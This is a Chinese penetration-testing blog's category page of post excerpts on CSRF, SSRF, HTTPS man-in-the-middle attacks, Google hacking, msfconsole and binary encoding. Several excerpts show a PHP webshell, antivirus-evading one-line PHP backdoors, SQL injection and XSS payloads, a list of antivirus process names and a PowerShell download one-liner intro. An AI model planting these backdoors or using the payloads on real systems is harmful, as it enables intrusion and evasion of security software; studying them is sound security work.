随笔分类 -  ShenTou

xsrf.md
摘要:csrf cross-site request forgery xss: 利用客户端对站点信任、 csrf: 利用站点对已认证的客户端的信任 业务逻辑漏洞 利用条件 客户端已完成身份认证 新的请求不需要新的身份认证或确认机制 攻击者了解web app请求的参数构造 诱使用户触发攻击指令 阅读全文
posted @ 2022-05-27 14:10 nsfoxer 阅读(32) 评论(0) 推荐(0)
杀软进程.md
摘要:"360tray.exe": "360安全卫士-实时保护", "360safe.exe": "360安全卫士-主程序", "ZhuDongFangYu.exe": "360安全卫士-主动防御", "360sd.exe": "360杀毒", "a2guard.exe": "a-squared杀毒", 阅读全文
posted @ 2022-05-27 14:08 nsfoxer 阅读(100) 评论(0) 推荐(0)
一句话下载器.md
摘要:一句话下载器 PowerShell File Download PowerShell 是一种winodws原生的脚本语言,对于熟练使用它的人来说,可以实现很多复杂的功能。 在windows 2003之中默认支持这种脚本。 下面这两条指令实现了从Internet网络下载一个文件。 $p = New-O 阅读全文
posted @ 2022-05-27 14:00 nsfoxer 阅读(107) 评论(0) 推荐(0)
google_hack.md
摘要:高级搜索的使用方法 inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范围的域名. filetype: 搜索文件的后缀或者扩展名 intitle: 限 阅读全文
posted @ 2022-05-27 14:00 nsfoxer 阅读(111) 评论(0) 推荐(0)
digit.md
摘要:原码、反码和补码 用反码表示有符号数时,符号位保持不变,数值大小定义为 用补码表示有符号数时,符号位保持不变,数值大小定义为 正数的原码、反码和补码形式相同。求负数的补码时,为了避免做减法运算,一般方法是:先求出负数的反码(将原码的数值位逐位求反),然后在最低位加1即可得到补码,即 ​ (N)补码= 阅读全文
posted @ 2022-05-27 14:00 nsfoxer 阅读(49) 评论(0) 推荐(0)
windows截屏.md
摘要:windows截屏 PSR(Problem Steps Recorder),直译为问题步骤记录器,在Windows 早期的系统中,采用WER(Windows Error Reporting)来收集系统的错误报告,但这些报告往往包含的信息太少以致于无法解决实际问题。 为此,微软从Windows 7系统 阅读全文
posted @ 2022-05-27 14:00 nsfoxer 阅读(120) 评论(0) 推荐(0)
sql手工注入.md
摘要:sql手工注入 mysql #当前数据库库名,用户名 union select database(), user() #找所有数据库库名 select+schema_name+from+information_schema.schemata limit 1,1; #找一个数据库库中有哪些表名 sel 阅读全文
posted @ 2022-05-27 14:00 nsfoxer 阅读(80) 评论(0) 推荐(0)
webshell.md
摘要:webshell php <?php echo shell_exec($_GET['cmd']);?> 中国菜刀 可能被IDS WAF AV 扫描器 查杀 WeBoCoo(Web Backdoor Cookie)-->php 类终端shell 通信使用cookie传输 `服务端生成` webacoo 阅读全文
posted @ 2022-05-27 14:00 nsfoxer 阅读(56) 评论(0) 推荐(0)
msfconsole.md
摘要:msfconsole 数据库 systemctl start postgresql.service db_status db_rebuild_cache#已停用 msfdb reinit db_connect db_disconnect db_nmap hosts services -S 445 c 阅读全文
posted @ 2022-05-27 13:50 nsfoxer 阅读(39) 评论(0) 推荐(0)
ssrf攻击概述.md
摘要:ssrf攻击概述 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击(Server-side Reque 阅读全文
posted @ 2022-05-27 13:50 nsfoxer 阅读(139) 评论(0) 推荐(0)
https中间人攻击.md
摘要:https中间人攻击 使用tls/ssl方法进行加密传输 http攻击方法 降级攻击 解密攻击(明文,证书伪造) 协议漏洞,实现漏洞,配置不严格 openssl openssl s_client -connect www.baidu.com:443 **** sslscan 自动识别ssl配置错误, 阅读全文
posted @ 2022-05-27 13:49 nsfoxer 阅读(71) 评论(0) 推荐(0)
sql注入整理.md
摘要:sql注入整理 ' or 1=1--+ ' or 1=1-- ' or 1=1# ' or 1='1 ' || 1='1 ' || 1=1--+ ')or('a'='a "or"="a'='a --> ??? 'or''=' 'or'='or' -->??? 1 or '1'='1'=1 -->?? 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(13) 评论(0) 推荐(0)
一句话木马免杀.md
摘要:一句话木马 php 方法 字符串变形: substr(string, start, length) <?php $a = 'a'.'s'.'s'.'e'.'r'.'t'; $a($_POST['x']); ?> <?php $a = substr('1a',1).'s'.'s'.'e'.'r'.'t 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(112) 评论(0) 推荐(0)
xss.md
摘要:xss ​ cross-site-scripting ​ javascript 嵌入html <sctipt>alert("XSS");</script> 元素标签:<body onload=alert('XSS')> 图片:<img src="javascript:alert("XSS);"> 其 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(20) 评论(0) 推荐(0)